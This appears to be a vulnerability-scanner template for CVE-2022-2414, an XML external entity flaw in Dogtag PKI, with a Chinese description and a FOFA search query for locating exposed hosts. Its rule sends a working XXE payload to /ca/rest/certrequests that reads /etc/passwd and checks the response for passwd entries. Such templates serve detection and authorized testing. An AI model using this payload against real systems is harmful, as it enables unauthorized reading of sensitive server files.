id: CVE-2022-2414

info:
  name: Dogtag PKI XML实体注入漏洞 CVE-2022-2414
  author: daffainfo
  severity: critical
  description: |
    Dogtag PKI 的XML解析器存在安全漏洞，该漏洞源于在分析 XML 文档时访问外部实体可能会导致 XML 外部实体 （XXE） 攻击。此漏洞允许远程攻击者通过发送特制的 HTTP 请求来潜在地检索任意文件的内容。
    fofa-query: title="Identity Management"
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Dogtag%20PKI%20XML%E5%AE%9E%E4%BD%93%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%20CVE-2022-2414.md

rules:
  r0:
    request:
      method: POST
      path: /ca/rest/certrequests
      headers:
        Content-Type: application/xml
      body: |
        <!--?xml version="1.0" ?-->
        <!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
        <CertEnrollmentRequest>
          <Attributes/>
          <ProfileID>&ent;</ProfileID>
        </CertEnrollmentRequest>
    expression: response.status == 400 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()